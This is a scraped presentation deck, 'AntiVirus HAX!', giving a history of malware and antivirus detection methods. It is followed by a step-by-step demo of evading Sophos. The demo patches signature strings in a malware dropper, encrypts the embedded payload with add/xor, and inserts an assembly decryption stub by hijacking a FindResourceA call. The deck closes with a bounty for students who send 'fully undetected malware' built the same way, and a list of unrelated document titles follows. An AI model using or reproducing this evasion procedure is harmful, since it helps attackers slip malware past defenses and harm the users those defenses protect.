antivirus hax! - bluekaizen.org file info@synapse-labs.com antivirus hax! presented by ehab hussein...

http://www.synapse-labs.com info@synapse-labs.com

AntiVirus HAX!Presented by Ehab Hussein

Synapse Malware research team :Sofiane Talmat (Algeria)Ehab Hussein (Egypt)SaadTalaat (Egypt)Amr Thabet (Egypt)

Synapse Intro

History

AV Detection Techniques

Bypassing Sophos :) Demo

Student Bounty Challenge $$$

Solution

Development

Security

Services

Corporate Services

Trainings

Viruses don't harm, ignorance does!

« The Evolution of malware within the last ten years is described by the evolution of people who develop that » (Eugene kaspersky)

– 1948 – 1966 (First theroical Approach)

John von Neumann « Theory of self-reproducing automata »

– 1971 (First Worm)Robert (Bob) H. Thomas (BBN technologies)

"I'm the creeper, catch me if you can!"Machine : PDP-10System : TENEXTransport : ARPANETwas the world's first operational packet switching network and the core network of a set that came to compose the global Internet. Funded by Darpa

TROJAN HORSE

– 1974/1975 (First Trojan Virus)

John Walker « ANIMAL » UNIVAC 1108

– 1982/1982 (First microcomputer Virus)

Rich Skrenta « Elk Cloner »

Apple II Boot Sector

BOOT SECTOR

– 1986 (First IBM-PC Virus)Basit & Amjad Farooq Alvi

« Brain Boot Sector » « Pakistan Flu » « Lahore »

– 1986 (First File Infector Virus)

Ralf Burger « Virdem model».com

VirDem Ver.: 1.06 (Generation #) aktive. Copyright by R.Burger 1986,1987 Phone.: D - 05932/5451 This is a demoprogram for computerviruses. Please put in a number now. If you're right, you'll be able to continue. The number is between 0 and x

COM INFECTION

1987 (Destructive Virus)Vienna / Lehigh / Yale / Stoned / Ping Pong

Cascade (self-encrypting file virus)IBM Antivirus

1987Jerusalem

« Infecting .EXE »InterruptFriday 13th

1808(EXE)1813(COM)ArabStarBlackBoxBlackWindowFriday13th HebrewUniversityIsraeliPLORussian

EXE Infection

1988 (First Internet Worm)Robert Tappan Morris

« The Morris worm » Buffer Overflow 6000 infections

BUFFER OVERFLOW

1988 (First Multipartite Virus)Ghostball

EXE/COM/Boot Sector

Multipartite virusA multipartite virus is a computer virus that infects and spreads in multiple ways. The term was coined

to describe the first viruses that included DOS executable files and PC BIOS boot sector virus code,

where both parts are viral themselves. For a complete cleanup, all parts of the virus must be removed.

1988 (First Polymorphic Virus)Mark Washburn & Ralf Burger

« the Chameleon family » « Vienna and Cascade »

Polymorphism

1995 (First Macro Virus)« Concept »

Sub MAINREM That's enough to prove my pointEnd Sub

Macro VirusMacro is a language built into a software application such as a word processor. Since some applications

(notably, but not exclusively, the parts of Microsoft Office) allow macro programs to be embedded in documents, so that the programs may be run automatically when the document is opened

1998Chen Ing HauCIH v1

« Chernobyl / Spacefiller »

overwriting critical information on infected system drives, and more importantly, in some cases corrupting the system BIOS.

1999 (Year of the worms)

Jan 20: Happy99 worm (emails) (Spanska)

March 26: Melissa worm (Microsoft Word/ Outlook)

June 06: ExploreZip worm(Microsoft Office documents)

December 30: Kak worm (Javascript worm / Outlook Express bug)

2000 (The most damaging worm ever) « ILOVEYOU worm (VBS/Loveletter) »

VBScript

2000 (The year of Exploits)

Mai : Sadmind worm (Sun Solaris / Microsoft IIS)

Juillet : Code Red worm (Microsoft IIS indexing)

Septembre : Nimda worm (Windows/Code Red / Sadmind)

Octobre : Klez worm (MS IE / MS Outlook / Outlook Express)

2002 (Metamorphic virus)Mental Driller

« Win32/Simile » (Etap / MetaPHOR)90% metamorphoseMay 14 / System locale

METAMORPHIC VIRUS

metamorphic code is code that can reprogram itself. Often, it does this by translating its own code into a temporary representation,

editing the temporary representation of itself, and then writing itself back to normal code again. This procedure is done with the virus

itself, and thus also the metamorphic engine itself undergoes changes. This is used by some viruses when they are about to infect new files, and the result is that the "children" will never look like their

"parents".

2002/2003 (Rise of the RAT & Trojans)a RAT, or remote access trojan (sometimes remote administration tool) is a program that listens for and accepts connections from a remote 3rd party and carries out the commands that 3rd party gives it...

Beast (Delphi)

Optix Pro

Graybird

ProRat

2004 (First Webworm)« Santy »

- Target : phpbb forums- 40 000 sites infections

2006 (First ever Mac OS X virus)« OSX/Leap-A or OSX/Oompa-A »

Lan worm

Bonjour Protocol (iChat buddy list)

2007 « ZEUS » (drive-by downloads /phishing)

June 2009 : 74,000 FTP

3.6 million infections in USA

28 Oct.2009 : 1.5 million messages phishing on facebook

14/15 Nov. 2009 : 9 million emails infected(Verizon Wireless)

Credits cards of 15 banks compromised

1 Oct.2010 : FBI / 70 millions $ and 90 arrests

May.2011 : source code release

2007 (Mise a pirx : 250 000 $)« Conflicker »

NetBIOS Exploits MS08-067

BOTNET

Cyber Weapons !!!!!

2010 : STUXNETDestructive (targets industrial systems)

2011 : DuquNON Destructive (targets industrial systems to gather

information that could be useful in attacking)

AntiViruses

Possibly the first publicly documented removal of a computer virus in the wild was performed

by Bernd Fix in 1987Enough Said...

Detections

Signature Based Detection

Behaviour Based Detection

Normalization

What About rootkits

Signature-Based File Integrity Monitoring (ex: Tripwire)

Hooking Detection Network-Based Detection

Heuristics-Based Detection

Lets Bypass ThatAV #Demo

1- Locate the signature :

in our case we have :

A- the signature turko0x00003F87 0x000000050x00004343 0x000000050x000044EF 0x000000050x0002E754 0x000000050x0002E76C 0x000000050x0002E78F 0x00000005

B- the Starting of the MZ file to be droppedthe MZ signature starts from 37D64 : MZP

before the MZP there is another signature in unicode starting at 37D1Ait starts the unicode string DENAME

2- Patching the signature :

A- the signature turkoAll what we can do is change some chars to capital letters (playing with case) for all the patterns found

B- we need to encrypt the signature starting from 37D1A (43F11A in debugger)

from Hexworkshop we load the exe and we go to the address 37D1A (43F11A in debugger)

we select from there till the end of the file (approx 0xBC6E bytes)

we go to tools/operations and we make some encryption for example :

Add 20Xor 27

now back to debugger, we load the exe then we go to DATA section at address 43F11A :

we select the following part :0043F11A 44 00 45 00 4E 00 45 00 D.E.N.E.0043F122 4D 00 45 00 06 00 44 00 M.E..D.0043F12A 56 00 43 00 4C 00 41 00 V.C.L.A.0043F132 4C 00 03 00 45 00 44 00 L..E.D.0043F13A 54 00 0B 00 50 00 41 00 T..P.A.0043F142 43 00 4B 00 41 00 47 00 C.K.A.G.0043F14A 45 00 49 00 4E 00 46 00 E.I.N.F.0043F152 4F 00 07 00 52 00 4F 00 O..R.O.0043F15A 4F 00 54 00 4B 00 49 00 O.T.K.I.0043F162 54 00 4D 5A 50 T.MZP

we put a breakpoint on memory on access

We run the exe, the breakpoint will be hit at the following instruction :

7C9350C0 0FB706 MOVZX EAX,WORD PTR DS:[ESI]

we can see it's in NTDLL.DLL, we look into the stack and we search for the return address to our binary so we locate the original call addreswe find the following in the stack :

we go to the address 00403EC9 and we find the following instruction :

00403EC4 |. E8 AFF8FFFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA00403EC9 |. 8BF0 MOV ESI,EAX00403ECB |. 85F6 TEST ESI,ESI00403ECD |. 74 6B JE SHORT unpacked.00403F3A

we take the instruction that come before the return address

00403EC4 |. E8 AFF8FFFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA

we will take the that address and instruction and save them.

Next step we go at the end of the exe lets say addres 004307A2 and we write our decryption function

004307A2 > 60 PUSHAD004307A3 . 9C PUSHFD004307A4 . BF 1AF14300 MOV EDI,Copy_of_.0043F11A004307A9 . B9 E6BC0000 MOV ECX,0BCE6004307AE > 8A1F MOV BL,BYTE PTR DS:[EDI] ; |004307B0 . 80F3 27 XOR BL,27 ; |004307B3 . 80EB 20 SUB BL,20 ; |004307B6 . 881F MOV BYTE PTR DS:[EDI],BL ; |004307B8 . 47 INC EDI ; |004307B9 .^E2 F3 LOOPD SHORT Copy_of_.004307AE ; |004307BB . 9D POPFD ; |004307BC . 61 POPAD ; |

Now we will change the instruction :

00403EC4 |. E8 AFF8FFFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA (CALL 00403778)

by the following

00403EC4 . E9 D9C80200 JMP Copy_of_.004307A2 ; (JMP 004307A2)

so we can jump to our decryption function

add the overwritten function and a jmp back to our decryption function like following :

004307A2 > 60 PUSHAD004307A3 . 9C PUSHFD004307A4 . BF 1AF14300 MOV EDI,Copy_of_.0043F11A004307A9 . B9 E6BC0000 MOV ECX,0BCE6004307AE > 8A1F MOV BL,BYTE PTR DS:[EDI] ; |004307B0 . 80F3 27 XOR BL,27 ; |004307B3 . 80EB 20 SUB BL,20 ; |004307B6 . 881F MOV BYTE PTR DS:[EDI],BL ; |004307B8 . 47 INC EDI ; |004307B9 .^E2 F3 LOOPD SHORT Copy_of_.004307AE ; |004307BB . 9D POPFD ; |004307BC . 61 POPAD ; |004307BD . E8 B62FFDFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA004307C2 .^E9 0237FDFF JMP Copy_of_.00403EC9

Last step is to mark our memory location at 0043F11A as Writeable so we can decrypt the data there and we do it with PE Explorer for example

Bounty challenge50$ discount on any synapse course & Recognition on synapse-labs facebook

To the student that will send usFully undetected malware using

Our same technique from the demo

Thank youFacebook.com/Synapse.Labs

Twitter : @Synapse_Labs

My Twitter: @__Obzy__My FaceBook: www.facebook.com/Obzysynapse

antivirus hax! - bluekaizen.org file info@synapse-labs.com antivirus hax! presented by ehab hussein...

Documents

breno hax - incomensurabilidade das teorias filosóficas

hax s4-kast

hax asia presentation public

hax asia introduction to deliverables

discurso arnoldo hax 05092007

modelo delta hax (e)

synapse solutions product guide synapse solutions ·...

hax n°6 versione speciale linuxday 2008

hvx-series diesel engine shut down valves...hax-31282.5 (31/...

2 modelo delta a. hax - marketingunab.com€¦ · modelo...

hax s4-quitbit

hax s4-darma

synapse fit

gestión empresa - hax majluf

· *a=jap @= hax jkj f ch=pne

hax s4-syrmo

android hax - oberheide · – intent handler fetches apk...

the anti-apoptotic protein hax-1 is a regulator of …hax-1...

hax s4-shotstats

hax @ hardware.co - 8 things